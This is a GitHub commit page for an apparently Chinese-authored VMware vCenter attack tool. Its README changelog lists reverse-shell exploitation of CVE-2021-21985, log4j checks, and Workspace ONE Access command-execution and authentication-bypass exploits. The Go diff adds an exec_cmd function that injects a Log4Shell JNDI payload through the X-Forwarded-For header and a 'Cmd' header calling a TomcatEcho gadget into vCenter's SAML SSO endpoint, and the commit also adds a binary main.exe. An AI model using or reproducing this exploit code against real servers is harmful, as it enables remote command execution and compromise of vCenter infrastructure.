Skip to content

Commit

Permalink
bug fix
Browse files Browse the repository at this point in the history
  • Loading branch information
root committed Oct 10, 2022
1 parent 15e84a6 commit 90ef77b
Show file tree
Hide file tree
Showing 3 changed files with 42 additions and 2 deletions.
1 change: 1 addition & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -68,6 +68,7 @@ V1.0 上线
V1.1 针对CVE-2021-21985添加了利用rmi反弹shell的功能,前提是你要启动一个rmi服务器,例如jndi-injection-exploit
V1.2 增加了针对Vcenter的log4j检测和验证能力
V1.3 增加了对Vmware WorkSpace One Access的漏洞验证功能,包括CVE-2022-22954 远程命令执行;CVE-2022-22972、CVE-2022-31656身份鉴别绕过
V1.3.1 修复了检测log4j时忽略了端口的问题,有的服务会更改默认的443端口
...
```

Binary file added main.exe
Binary file not shown.
43 changes: 41 additions & 2 deletions src/log4jcenter/log4j.go
Original file line number Diff line number Diff line change
Expand Up @@ -74,7 +74,7 @@ func firstCheck(data []byte) bool {
func StartScan(url string) {
wg.Add(1)
go rmiServer()
check_alive(url)
// check_alive(url)
target := strings.TrimLeft(url, "https://")
local_ip := getIpAddr2(target)
fmt.Println("[*] your local IP: " + local_ip)
Expand Down Expand Up @@ -127,8 +127,47 @@ func exploit(url, rmiserver string) {

}

func exec_cmd(url, rmiserver, command string) {
host := rmiserver
client := req.C()
client.EnableForceHTTP1()
client.EnableInsecureSkipVerify()
client.SetTimeout(2 * time.Second)
// client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403
rmi_server := fmt.Sprintf("${jndi:%s}", host)
myheader := map[string]string{
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"X-Forwarded-For": rmi_server,
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"Cmd": rmi_server + "/TomcatBypass/TomcatEcho",
}

client.R().
SetHeaders(myheader).
Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=")

}

func getIpAddr2(url string) string {
conn, err := net.Dial("tcp", url+":443")

tmp := strings.Split(url, ":")
port := ""
ipaddr := ""
if len(tmp) > 1 {
ipaddr = tmp[0]
port = tmp[1]
} else {
ipaddr = url
port = "443"
}
fmt.Println(port)
conn, err := net.Dial("tcp", ipaddr+":"+port)
if err != nil {
fmt.Println(err)
return ""
Expand Down

0 comments on commit 90ef77b

Please sign in to comment.